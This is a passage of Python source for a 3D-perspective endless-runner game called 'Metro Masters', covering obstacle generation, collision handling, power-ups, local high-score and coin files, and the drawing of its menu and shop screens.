== True:\n return False\n else:\n state[lane][loc] = True\n elif move.startswith(\"JUMP\"):\n if str(loc) in '01':\n if spot == True:\n return False\n else:\n state[lane][loc] = True\n \n return True\n\n #advanced recursive backtracking\n def generateSection(self, target, moves = None, number = 0):\n\n if moves == None:\n moves = []\n\n if number >= target:\n return moves\n\n scrambledMoves = self.randomizeMoves()\n\n for move in scrambledMoves:\n moves += [move]\n\n if self.isLegal(moves):\n result = self.generateSection(target, 
moves, number + 1)\n if result != None:\n return result\n moves.remove(move)\n\n return None\n\n \n def timerFired(self):\n if self.transitioning == True:\n self.transitionFrame += self.dF\n\n if self.transitionFrame == self.transitionFrames:\n self.currentMode = self.toMode\n \n if self.toMode == \"end\":\n self.endActivated()\n if self.toMode == \"play\":\n self.appStarted()\n self.currentMode = \"play\"\n self.transitionFrame = self.transitionFrames\n self.transitioning = True\n\n self.dF = -1\n \n if self.transitionFrame < 0:\n self.transitionFrame = 0\n self.dF = 1\n self.transitioning = False\n\n\n if self.currentMode == \"play\":\n if self.runner.alive:\n self.timeElapsed += self.timerDelay\n if self.runner.currentPowerUp == \"DOUBLE POINTS\":\n self.score += int(self.timerDelay * self.multiplier * self.speed * 2)\n else:\n self.score += int(self.timerDelay * self.multiplier * self.speed)\n self.scrollZ -= .3\n self.runner.powerUpTimeLeft = max(self.runner.powerUpTimeLeft - self.timerDelay, 0)\n if self.runner.powerUpTimeLeft <= 0 and self.runner.currentPowerUp != None:\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.forceField = False #remove forcefield\n if self.runner.currentPowerUp == \"AI\":\n self.objects = []\n self.runner.currentPowerUp = None\n\n renderedObjects = []\n objectsInSector = [[0,0],[0,0],[0,0]] #there a 6 sectors (2 per lane)\n\n for obj in self.objects:\n \n obj.changeDistance(-self.speed)\n if not obj.visible:\n obj.visible = True\n\n frontPos, endPos, delPos = 0,0,0\n \n if isinstance(obj, Ladder):\n frontPos, endPos, delPos = -11, -11.4, -15\n elif isinstance(obj, Train):\n frontPos, endPos, delPos = -11.1, -14, -15\n elif isinstance(obj, JumpBarrier):\n frontPos, endPos, delPos = -11.2, -11.4, -13\n elif isinstance(obj, DuckBarrier):\n frontPos, endPos, delPos = -11.2, -11.4, -13\n\n level = None\n \n if obj.speed > 0: #if train collides with another object, stop it\n if isinstance(obj, (Ladder, Train)):\n for obj2 in self.objects:\n if obj2.lane == obj.lane:\n if isinstance(obj2, (JumpBarrier, DuckBarrier, Train)):\n if .05 < abs(obj2.zDistance - obj.zDistance) < .1:\n if not(isinstance(obj, Ladder) and isinstance(obj2, Train)):\n obj.speed = 0\n\n if endPos < obj.zDistance < frontPos:\n \n #first ignore all collisions in the lane\n for i in range(2):\n for j in range(3):\n self.collisionBox[obj.lane][i][j] = False\n\n #now determine where the collisions are\n if isinstance(obj, (Train, Ladder)):\n self.collisionBox[obj.lane][0][0] = True\n self.collisionBox[obj.lane][0][1] = True\n self.collisionBox[obj.lane][0][2] = True\n level = 0\n \n elif isinstance(obj, JumpBarrier):\n self.collisionBox[obj.lane][0][0] = True\n self.collisionBox[obj.lane][0][1] = True\n level = 0\n elif isinstance(obj, DuckBarrier):\n self.collisionBox[obj.lane][0][1] = True\n self.collisionBox[obj.lane][0][2] = True\n level = 0\n\n #special collisions (something else happens besides ending game)\n if self.runner.currentLane == obj.lane:\n if isinstance(obj, Ladder):\n #puts the player on the top\n for i in range(2):\n for j in range(3):\n if i == j == 1: #top row default stance:\n self.runner.collisionBox[obj.lane][i][j] = True\n else:\n self.runner.collisionBox[obj.lane][i][j] = False\n self.runner.climbing = True\n level = 0\n \n objectsInSector[obj.lane][level] += 1\n\n if isinstance(obj, Decoration):\n if obj.zDistance > -15: #in screen\n renderedObjects += [obj]\n else:\n if obj.zDistance > delPos: #in screen\n renderedObjects += [obj]\n self.objects = 
renderedObjects\n\n for i in range(3):\n for j in range(2):\n if objectsInSector[i][j] == 0: #if there are NO OTHER OBJECTS in the sector\n for k in range(3):\n self.collisionBox[i][j][k] = False\n\n renderedCoins = []\n for coin in self.coins:\n coin.changeDistance(-self.speed)\n if not coin.visible:\n coin.visible = True\n if coin.z > 0: #still on screen\n renderedCoins += [coin]\n else:\n coinX, coinY = coin.coordinatesToAbsolute()\n runnerX, runnerY = self.runner.coordinatesToAbsolute()\n if coin.theText == \"?\":\n if abs(runnerX-coinX) < coin.r*16 and abs(runnerY-coinY) < coin.r*16:\n self.runner.currentPowerUp = random.choice(self.allPowerUps)\n self.runner.powerUpTimeLeft = getUpgrade(self.runner.currentPowerUp)\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.forceField = True\n else:\n if self.runner.currentPowerUp == \"MAGNET\":\n self.coinsCollected += 5\n elif abs(runnerX-coinX) < coin.r*16 and abs(runnerY-coinY) < coin.r*16:\n self.coinsCollected += 1\n\n self.coins = renderedCoins\n \n renderedPlanks = []\n for plank in self.planks:\n plank.changeDistance(-self.speed)\n if not plank.visible:\n plank.visible = True\n if plank.zDistance > -5: #still on screen\n renderedPlanks += [plank]\n self.planks = renderedPlanks\n\n generateNow = int(self.timerDelay * (7-self.difficulty) * 20)\n\n if self.timeElapsed% generateNow == 0:\n givenSection = self.generateSection(random.randint(max(self.difficulty-3, 1), self.difficulty))\n prevSpeed = [0,0,0] #makes sure ladders are attached to front of trains\n for move in givenSection:\n chooseLane = int(move[-1])\n obj = move[:-1]\n if obj == \"TRAIN\":\n speed = random.randint(25, 35 + (max(self.difficulty-3,0) * 6))/1000\n prevSpeed[chooseLane] = speed\n self.createTrainWrapper(chooseLane, speed)\n elif obj == \"LADDER\":\n self.createLadderWrapper(chooseLane, prevSpeed[chooseLane])\n elif obj == \"JUMP\":\n self.createJumpBarrierWrapper(chooseLane)\n elif obj == \"DUCK\":\n self.createDuckBarrierWrapper(chooseLane)\n\n if self.timeElapsed%1000 == 0:\n self.speed += .0005\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n if self.oldSpeed == 0:\n self.oldSpeed = self.speed\n self.speed = .16\n else:\n if almostEqual(self.speed, .1605):\n self.speed = self.oldSpeed\n self.oldSpeed = 0\n self.speed = min(self.speed, .12)\n \n if self.speed < .02: self.difficulty = 1\n elif self.speed < .04: self.difficulty = 1\n elif self.speed < .06: self.difficulty = 2\n elif self.speed < .08: self.difficulty = 3\n elif self.speed < .1: self.difficulty = 4\n else: self.difficulty = 5 \n\n if self.timeElapsed%500 == 0:\n self.createRailPlanks()\n\n if self.timeElapsed%10000 == 0:\n self.createTunnelWrapper()\n\n if self.timeElapsed%2000 == 100 and self.map == \"GOLDEN GATE BRIDGE\":\n self.createBridgeWrapper()\n\n if self.timeElapsed%750 == 0:\n if self.timeElapsed%24000 == 12000:\n self.createPowerUp()\n else:\n self.createCoin()\n\n if self.runner.climbing:\n self.runner.climbTick()\n if self.runner.jumping:\n self.runner.jumpTick()\n elif self.runner.ducking:\n self.runner.duckTick()\n else:\n self.focus[1] = self.defaultHorizonLevel\n\n if self.runner.switchingLanes != 0:\n if self.runner.currentPowerUp == \"AI\":\n animTime = 90\n else:\n animTime = 100\n distanceMoved = self.width/2.5\n percentFinished = self.laneSwitchTime/animTime\n self.laneSwitchTime += self.timerDelay\n if percentFinished > 1:\n percentFinished = 1\n self.cameraPos[0] = self.storedOldCameraPos + 
self.runner.switchingLanes*distanceMoved*math.sin(percentFinished)\n self.focus[0] = self.storedOldCameraFoc + self.runner.switchingLanes *distanceMoved*math.sin(percentFinished)*1.1 #1.1 = how much is the camera rotating?\n\n if percentFinished == 1:\n self.runner.switchingLanes = 0\n self.laneSwitchTime = 0\n self.storedOldCameraPos = self.cameraPos[0]\n self.storedOldCameraFoc = self.focus[0]\n\n self.runner.checkFall()\n self.checkCollisions()\n\n def checkCollisions(self):\n #don't bother checking collisions if there is nothing to collide with!\n if self.collisionBox != [\n [[False, False, False],[False, False, False]], \n [[False, False, False],[False, False, False]],\n [[False, False, False],[False, False, False]]]:\n if not self.runner.climbing:\n for i in range(3):\n for j in range(2):\n for k in range(3):\n if self.collisionBox[i][j][k] == self.runner.collisionBox[i][j][k] == True:\n if self.runner.currentPowerUp == \"AI\":\n if self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [True, True, False]:\n self.movementInput(\"Up\")\n elif self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [False, True, True]:\n self.movementInput(\"Down\") \n elif self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [True, True, True]:\n if self.runner.currentLane == 0:\n self.movementInput(\"Right\")\n elif self.runner.currentLane == 1:\n if self.collisionBox[0][self.runner.fLevel] == [True, True, True]:\n self.movementInput(\"Right\")\n else:\n self.movementInput(\"Left\")\n elif self.runner.currentLane == 2:\n self.movementInput(\"Left\")\n else:\n if self.runner.forceField:\n self.runner.forceField = False\n self.objects = [] #clear everything\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.currentPowerUp = None\n else:\n self.runner.alive = False\n self.toEnd()\n elif self.runner.currentPowerUp == \"AI\":\n if random.randint(1, 30) == 20:\n direction = random.choice([\"Left\",\"Right\"])\n if direction == \"Right\" and self.runner.currentLane < 2 and self.collisionBox[self.runner.currentLane+1][self.runner.fLevel] == [False, False, False]:\n self.movementInput(\"Right\")\n if direction == \"Left\" and self.runner.currentLane > 0 and self.collisionBox[self.runner.currentLane-1][self.runner.fLevel] == [False, False, False]:\n self.movementInput(\"Left\")\n \n \n \n \n\n\n def movementInput(self, direction):\n if direction == \"w\" or direction == \"Up\":\n if not self.runner.jumping and not self.runner.ducking:\n self.runner.jumping = True\n if direction == \"s\" or direction == \"Down\":\n if not self.runner.jumping and not self.runner.ducking:\n self.runner.ducking = True\n if direction == \"a\" or direction == \"Left\":\n if self.runner.switchingLanes == 0 and self.runner.changeLane(-1):\n self.runner.switchingLanes = -1\n if direction == \"d\" or direction == \"Right\":\n if self.runner.switchingLanes == 0 and self.runner.changeLane(1):\n self.runner.switchingLanes = 1\n\n def keyPressed(self, event):\n if self.runner.currentPowerUp != \"AI\":\n self.movementInput(event.key)\n\n def createLanesAndRails(self):\n lanes = []\n rails = []\n laneWidth = 1/3 #fraction of total width\n railWidth = 1/27 #fraction of total width\n for i in range(3):\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n color = \"cyan\"\n elif self.runner.currentPowerUp == \"DOUBLE POINTS\":\n color = \"yellow\"\n elif self.runner.currentPowerUp == \"MAGNET\":\n color = \"pink\"\n else:\n color = \"orange\"\n if i%2 == 0:\n if self.runner.currentPowerUp == 
\"SPEEDY BOOTS\":\n color = \"cyan2\"\n elif self.runner.currentPowerUp == \"DOUBLE POINTS\":\n color = \"gold\"\n elif self.runner.currentPowerUp == \"MAGNET\":\n color = \"pink2\"\n else:\n color = \"darkorange\"\n x0 = (laneWidth)*i\n x1 = (laneWidth)*(i+1)\n lanes += [Surface(self, [Point(self, x0,1,0), Point(self, x1,1,0), Point(self, x1,1,1), Point(self, x0,1,1)], color)]\n\n color = \"gray\"\n rails += [Surface(self, [Point(self, x0 + railWidth,1,0), Point(self, x0 + 2*railWidth,1,0), Point(self, x0 + railWidth,1,1), Point(self, x0 + 2*railWidth,1,1)], color)]\n rails += [Surface(self, [Point(self, x1 - 2*railWidth,1,0), Point(self, x1 - railWidth,1,0), Point(self, x1 - railWidth,1,1), Point(self, x1 - 2*railWidth,1,1)], color)]\n \n if self.map == \"GOLDEN GATE BRIDGE\":\n lanes += [Surface(self, [Point(self, -6*laneWidth,1,0), Point(self, -2*laneWidth,1,0), Point(self, -2*laneWidth,1,1), Point(self, -6*laneWidth,1,1)], \"red4\")]\n lanes += [Surface(self, [Point(self, 1+2*laneWidth,1,0), Point(self, 1+6*laneWidth,1,0), Point(self, 1+6*laneWidth,1,1), Point(self, 1+2*laneWidth,1,1)], \"red4\")]\n lanes += [Surface(self, [Point(self, -2*laneWidth,1,0), Point(self, 0,1,0), Point(self, 0,1,1), Point(self, -2*laneWidth,1,1)], \"seashell4\")]\n lanes += [Surface(self, [Point(self, 1,1,0), Point(self, 1+laneWidth*2,1,0), Point(self, 1+laneWidth*2,1,1), Point(self, 1,1,1)], \"seashell4\")]\n\n lanes += [Surface(self, [Point(self, -4*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,1), Point(self, -4*laneWidth,-1.4,1)], \"red3\")]\n lanes += [Surface(self, [Point(self, 1.5*laneWidth + 1,-1.4,0), Point(self, 4*laneWidth + 1,-1.4,0), Point(self, 4*laneWidth + 1,-1.4,1), Point(self, 1.5*laneWidth + 1,-1.4,1)], \"red3\")]\n elif self.map == \"MALIBU\":\n lanes += [Surface(self, [Point(self, -4*laneWidth,1,0), Point(self, -2*laneWidth,1,0), Point(self, -2*laneWidth,1,1), Point(self, -4*laneWidth,1,1)], \"gold\")]\n lanes += [Surface(self, [Point(self, 1+2*laneWidth,1,0), Point(self, 1+4*laneWidth,1,0), Point(self, 1+4*laneWidth,1,1), Point(self, 1+2*laneWidth,1,1)], \"gold\")]\n lanes += [Surface(self, [Point(self, -2*laneWidth,1,0), Point(self, 0,1,0), Point(self, 0,1,1), Point(self, -2*laneWidth,1,1)], \"yellow green\")]\n lanes += [Surface(self, [Point(self, 1,1,0), Point(self, 1+laneWidth*2,1,0), Point(self, 1+laneWidth*2,1,1), Point(self, 1,1,1)], \"yellow green\")]\n\n lanes += [Surface(self, [Point(self, -6*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,1), Point(self, -6*laneWidth,-1.4,1)], \"plum2\")]\n lanes += [Surface(self, [Point(self, 1.5*laneWidth + 1,-1.4,0), Point(self, 6*laneWidth + 1,-1.4,0), Point(self, 6*laneWidth + 1,-1.4,1), Point(self, 1.5*laneWidth + 1,-1.4,1)], \"plum2\")]\n\n return lanes, rails\n\n def createCoin(self):\n newCoins = []\n\n laneWidth = 1/3\n newCoins += [FocusedCircle(self, (laneWidth/2)+(random.randint(0,2) *laneWidth), 1, .7, \"$\", 5, \"yellow\", .1)]\n \n self.coins += newCoins\n\n def createPowerUp(self):\n newCoins = []\n\n laneWidth = 1/3\n newCoins += [FocusedCircle(self, (laneWidth/2)+(random.randint(0,2) *laneWidth), 1, .7, \"?\", 8, \"purple\", .1,)]\n \n self.coins += newCoins\n\n def createRailPlanks(self):\n for i in range(3):\n color = \"darkorange4\"\n\n laneWidth = 1/3 #fraction of total width\n plankCut = 1/36\n plankThickness = .01\n\n x0 = (laneWidth)*i\n x1 = (laneWidth)*(i+1)\n \n start = .4 + i*.05\n \n surfaces = [Surface(self, [Point(self, x0 + 
plankCut,1,start), Point(self, x1-plankCut,1,start), Point(self, x1-plankCut,1,start+plankThickness), Point(self, x0+plankCut,1,start+plankThickness)], color)]\n self.planks += [rectPrism(self, surfaces, 0, 0)] #heightless\n\n #CLICKING BUTTONS\n def toPlay(self):\n if self.transitionFrame == 0:\n if readFile('Upgrades.txt') == \"\" or readFile('Currency.txt') == \"\" or readFile('HighScores.txt') == \"\":\n getCurrency()\n getUpgrade(\"SPEEDY BOOTS\")\n if readFile('HighScores.txt') == \"\":\n defaultNPCs = \"Easy Lily-2500\\nExpert Dexter-50000\\nMaster Baxter-100000\\nSkilled Jill-7000\\nAdvanced Franz-20000\\n\"\n writeFile('HighScores.txt', defaultNPCs)\n self.toMode = \"instructions\"\n self.transitionFrame = 0\n self.transitioning = True\n else:\n self.toMode = \"play\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toShop(self):\n if self.transitionFrame == 0:\n self.toMode = \"shop\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toHelp(self):\n if self.transitionFrame == 0:\n self.toMode = \"help\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toScores(self):\n if self.transitionFrame == 0:\n self.toMode = \"scores\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toEnd(self):\n if self.transitionFrame == 0:\n self.toMode = \"end\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toHome(self):\n if self.transitionFrame == 0:\n self.toMode = \"home\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def upgradeSpeedyBoots(self):\n upgradePowerUp(\"SPEEDY BOOTS\")\n\n def upgradeMagnet(self):\n upgradePowerUp(\"MAGNET\")\n\n def upgradeDoublePoints(self):\n upgradePowerUp(\"DOUBLE POINTS\")\n\n def upgradeAI(self):\n upgradePowerUp(\"AI\")\n\n #modeActivated\n\n def endActivated(self):\n\n if readFile('HighScores.txt') == \"\":\n defaultNPCs = \"Easy Lily-2500\\nExpert Dexter-50000\\nMaster Baxter-100000\\nSkilled Jill-7000\\nAdvanced Franz-20000\\n\"\n writeFile('HighScores.txt', defaultNPCs)\n\n newScore(self.score)\n self.personalHighest = getBestScore(\"You\")\n changeCurrency(self.coinsCollected)\n\n\n\n\n\n #all code below here draws the graphics.. 
\n # ALL MODES ARE IN HERE, TO FUTURE SELF, \n # SO CODE MAY LOOK CHAOTIC (but in reality it isn't)\n\n\n def redrawAll(self, canvas):\n\n if self.currentMode == \"home\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n canvas.create_image(self.cx, self.cy/2, image = ImageTk.PhotoImage(self.logo))\n\n buttonCenter = (self.cx/2, self.cy*1.2)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"START\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.2)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toShop)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SHOP\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx/2, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toScores)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SCORES\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHelp)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HELP\", font = f\"Constantia 40\")\n\n\n\n elif self.currentMode == \"instructions\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"INSTRUCTIONS\", font = f\"Constantia 60\")\n theText = \"\"\"You seem new here... Welcome to Metro Masters!\nUse the arrow keys or WASD to navigate through the subways.\nJump using up arrow/w and Duck using down arrow/s!\nAvoid getting hit by a train! The game will become faster and faster.\nPick up power ups (a purple '?') and reveal its mystery!\nThe trains will strategically become more difficult to surpass.\nCollect coins in-game and level up your power ups in the shop! 
\nTry beating current NPC scores or beat your own!\"\"\"\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = theText, font = f\"Constantia 20\")\n\n buttonCenter = (self.cx, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"BEGIN!\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"help\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"INSTRUCTIONS\", font = f\"Constantia 60\")\n theText = \"\"\"Use the arrow keys or WASD to navigate through the subways.\\nJump using up arrow/w and Duck using down arrow/s!\\nAvoid getting hit by a train! The game will become faster and faster.\\nThe trains will strategically become more difficult to surpass.\\nCollect coins in-game and level up your power ups in the shop! \\nTry beating current NPC scores or beat your own!\\n\\nAI power up auto-runs the game for you!\\nDouble Points doubles your multiplier!\\nSpeedy Boots speeds up the game with a force field!\\nMagnet auto-grabs coins and makes them worth more!\"\"\"\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = theText, font = f\"Constantia 20\")\n\n buttonCenter = (self.cx, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"end\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"CONGRATULATIONS!\", font = f\"Constantia 60\")\n\n buttonCenter = (self.cx, self.cy/2)\n canvas.create_text(buttonCenter[0], buttonCenter[1], text = f\"SCORE: {self.score}\", font = f\"Constantia 50\", fill = \"gray\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+50, text = f\"PERSONAL BEST: {self.personalHighest}\", font = f\"Constantia 30\", fill = \"pink\")\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = f\"COINS: {self.coinsCollected}\", font = f\"Constantia 50\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+43, text = f\"TOTAL COINS: {getCurrency()}\", font = f\"Constantia 30\", fill = \"pink\")\n\n buttonCenter = (self.cx/2, self.cy*1.4)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"RESTART\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.6)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toShop)\n canvas.create_image(buttonCenter, image = 
ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SHOP\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx/2, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toScores)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SCORES\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"scores\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HIGH SCORES!\", font = f\"Constantia 60\")\n buttonCenter = (self.cx, self.cy/2)\n\n canvas.create_rectangle(self.cx/4, self.cy/2.5, self.cx* (7/4), self.cy * (4.75/3), fill = \"seashell3\", width = 4)\n scores = listTopNScores(10)\n for i, content in enumerate(scores.split('\\n')):\n canvas.create_text(buttonCenter[0], buttonCenter[1] + (i*50), text = content, font = f\"Constantia 30\")\n\n buttonCenter = (self.cx, self.cy*1.85)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"shop\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"ANT'S SHOP\", font = f\"Constantia 60\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+80, text = f\"COINS: {getCurrency()}\", fill = \"gold\", font = f\"Constantia 30\")\n\n buttonCenter = (self.cx/3, self.cy*(2.5/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeSpeedyBoots)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.speedyBootsImage))\n level = (getUpgrade(\"SPEEDY BOOTS\")-10000)//2000\n cost = int(getUpgrade(\"SPEEDY BOOTS\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeSpeedyBoots)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeSpeedyBoots)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"SPEEDY BOOTS\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n\n\n buttonCenter = (self.cx/3, self.cy*(3.75/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeDoublePoints)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.multiplierImage))\n 
canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 40\")\n level = (getUpgrade(\"DOUBLE POINTS\")-10000)//2000\n cost = int(getUpgrade(\"DOUBLE POINTS\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeDoublePoints)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeDoublePoints)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"DOUBLE POINTS\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n\n\n buttonCenter = (self.cx/3, self.cy*(5/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeMagnet)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.magnetImage))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 40\") \n level = (getUpgrade(\"MAGNET\")-10000)//2000\n cost = int(getUpgrade(\"MAGNET\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeMagnet)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeMagnet)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"MAGNET\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n buttonCenter = (self.cx/3, self.cy*(6.25/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeAI)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.AIImage))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 